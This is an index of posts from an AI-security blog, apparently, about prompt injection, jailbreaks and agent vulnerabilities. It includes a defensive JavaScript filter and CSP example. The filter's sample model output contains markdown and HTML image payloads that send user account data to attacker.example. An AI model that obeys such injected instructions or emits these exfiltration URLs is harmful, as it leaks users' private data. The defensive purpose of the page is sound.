All posts
- LLM Prompt Injection Attack Examples: Direct, Indirect, and Agentic Exploits
  A practitioner-level breakdown of LLM prompt injection attack examples — from basic instruction overrides to CVE-rated zero-click exploits in production agentic systems.
- AI Sec Weekly: Friday, May 22, 2026
  This week's digest: SSRF through agent tool-use, the model supply-chain class and why safetensors matters, and model extraction as a business risk. Plus one regulatory item, one technical item, and the reading list. Verify specifics against primary sources.
- AI on the Offense: Google's Zero-Day Warning, Reasoning-Model Jailbreaks, and Government Testing
  Google says it caught an attacker using an LLM to find a zero-day, peer-reviewed research shows reasoning models can autonomously jailbreak other models, and CAISI signs frontier-model testing deals. What's signal, what's hype, and what to actually do.
- How LLM Chatbots Leak Data Through Their Own Rendered Output
  A recurring AI-security finding: an injected instruction makes the model emit a markdown image whose URL carries the user's data to an attacker server. Why this works, why CSP is the real fix, and what to check this week.
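The rendered-output leak this entry describes, as an added example that is not code from the original post or from any project it covers: a render-time filter that drops markdown and raw-HTML images whose host is not on an allowlist, alongside the CSP `img-src` directive that blocks the fetch in the browser regardless. The allowed host `cdn.example.com`, the attacker host `attacker.example` and the sample model output (including the leaked account data in the image URL) are all constructed for the example.

```javascript
// Added example (not code from the original post): catch the markdown-image
// exfiltration pattern at render time, and emit the CSP that blocks it anyway.
// Host names, the sample model output and the "secret" in it are constructed.

const ALLOWED_IMAGE_HOSTS = new Set(["cdn.example.com"]); // assumption: your own CDN

// Markdown inline image: ![alt](url "optional title")
const MD_IMAGE_RE = /!\[([^\]]*)\]\(\s*<?([^\s)>]+)>?(?:\s+"[^"]*")?\s*\)/g;
// Raw HTML <img ...> that a permissive markdown renderer would pass through
const HTML_IMG_RE = /<img\b[^>]*>/gi;

function imageHostAllowed(rawUrl) {
  let url;
  try {
    url = new URL(rawUrl); // relative or malformed URLs throw: treat as not allowed
  } catch {
    return false;
  }
  if (url.protocol !== "https:") return false; // rejects http:, data:, javascript:
  return ALLOWED_IMAGE_HOSTS.has(url.hostname.toLowerCase());
}

// Returns the filtered markdown plus the list of images that were blocked,
// so the caller can log and alert on the attempt rather than silently drop it.
function sanitizeModelMarkdown(markdown) {
  const blocked = [];
  let out = markdown.replace(MD_IMAGE_RE, (match, alt, url) => {
    if (imageHostAllowed(url)) return match;
    blocked.push(url);
    return `[image blocked: ${alt || "untrusted source"}]`;
  });
  out = out.replace(HTML_IMG_RE, (tag) => {
    blocked.push(tag); // raw <img> is never worth allowing in model output
    return "[image blocked: raw HTML]";
  });
  return { markdown: out, blocked };
}

// The CSP directive that makes the browser refuse any other image origin,
// which is what actually stops the exfiltration request from being sent.
function imageCsp() {
  const hosts = [...ALLOWED_IMAGE_HOSTS].map((h) => `https://${h}`).join(" ");
  return `img-src 'self' ${hosts};`;
}

// Constructed model output: the first and third images are exfiltration
// payloads carrying user data in the query string; the second is legitimate.
const SAMPLE_OUTPUT = [
  "Here is your summary.",
  "![loading](https://attacker.example/c.png?d=ACCT-4421%20balance%2012000)",
  "![chart](https://cdn.example.com/charts/q1.png)",
  '<img src="https://attacker.example/p.gif?d=leak">',
].join("\n");

const result = sanitizeModelMarkdown(SAMPLE_OUTPUT);
console.log(result.markdown);
console.log("blocked:", result.blocked);
console.log("Content-Security-Policy:", imageCsp());
```

The filter is defence in depth, not the fix: an injected instruction can find an encoding or a renderer quirk a regex misses, and plain markdown links still exfiltrate if the user clicks them. The entry's own point stands: serve the `img-src` policy on the chat page so the browser never issues the request, and treat anything that lands in `blocked` as a signal worth alerting on.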
- AI Sec Weekly: Friday, May 15, 2026
  This week's digest: indirect injection becomes the agent-era default, the markdown-rendering data-exfiltration class, and why system-prompt secrecy keeps failing. Plus one regulatory item, one technical item, and the reading list. Verify specifics against primary sources.
- The LiteLLM SQL Injection (CVE-2026-42208) and Why AI Gateways Are Crown Jewels
  A pre-auth SQL injection in the LiteLLM proxy landed in CISA's KEV catalog and was exploited within roughly 36 hours of disclosure. The bug is ordinary; the lesson is about where your AI stack concentrates secrets. What to check this week.
- Indirect Prompt Injection: The Agent Era's Default Vulnerability
  As LLM agents gained tools and memory, the dangerous injection stopped coming from the user and started coming from the data the agent reads. A defender's breakdown of why this class resists patching and what containment looks like.
- The OWASP LLM Top 10 (2025) Changed More Than the Numbering
  The 2025 revision of the OWASP Top 10 for LLM Applications added system-prompt leakage and vector/embedding weaknesses, and reframed the supply-chain entry. Here's what actually shifted and why it matters for defenders.
- How AI Sec Weekly Works: The Format and Why It Looks This Way
  Every Friday digest follows the same structure for a reason. Here's the format breakdown: three top stories, the reading list, and what gets left out.
- What this site is for
  AI Sec Weekly covers cybersecurity news with an engineer's filter. Here's what we publish.